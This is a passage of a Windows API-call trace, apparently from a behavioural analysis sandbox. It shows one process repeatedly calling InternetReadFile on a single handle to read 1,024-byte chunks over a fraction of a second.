InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.874] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.874] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.874] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.875] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.875] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.875] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.875] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.875] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.875] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.875] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.875] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.875] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.875] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.933] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.933] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.934] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.934] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.934] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.934] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.934] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.934] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.934] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.934] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.934] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.934] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.934] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.934] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.935] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.935] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.935] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.935] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.936] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.936] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.936] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.936] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.936] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.936] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.936] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.936] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.982] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.982] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.982] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.982] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.982] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.982] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.982] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.982] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.982] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.982] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.983] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.983] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.983] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.983] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.983] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.983] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.983] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.983] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.983] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.983] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.983] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.984] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.984] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.984] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.984] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.984] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0172.984] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.028] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.028] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.028] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.028] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.028] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.028] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.028] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.028] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.028] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.029] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.029] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.029] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.029] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.029] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.029] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.029] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.029] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.029] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.029] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.029] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.029] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.030] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.030] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.030] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.030] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.030] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.030] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.093] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.093] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.093] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.094] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.094] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.094] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.094] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.094] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.094] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.094] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.094] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.094] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.094] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.095] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.095] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.095] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.095] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.095] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.095] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.095] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x1983d8 | out: lpBuffer=0x1983ec*, lpdwNumberOfBytesRead=0x1983d8*=0x400) returned 1 [0173.095] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1983ec, dwNumberOfBytesToRead=0x400, 